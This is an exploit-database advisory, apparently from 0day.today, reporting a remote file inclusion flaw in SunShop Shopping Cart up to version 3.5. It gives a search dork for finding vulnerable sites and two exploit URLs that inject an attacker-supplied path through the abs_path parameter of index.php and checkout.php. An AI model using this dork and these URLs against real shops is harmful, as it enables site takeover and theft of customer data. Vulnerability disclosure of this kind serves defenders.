id: 1765
date: 04/15/2007
title: SunShop Shopping Cart <= 3.5 (abs_path) RFI Vulnerabilities
author: irvian
cves: 

===========================================================
SunShop Shopping Cart <= 3.5 (abs_path) RFI Vulnerabilities
===========================================================


sunshop 4 (index.php) Remote File Include Vulnerability

-----------------------------------------------------------------------------------------
# scripts       : SunShop v3.5
# Discovered By : irvian
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz,permenhack
# dork          : "powered by sunshop"
------------------------------------------------------------------------------------------
bug found:

Exploit: www.target.com/index.php?abs_path=[evilcode]
         www.target.com/checkout.php?abs_path=[evilcode]



#  0day.today [2023-03-23]  #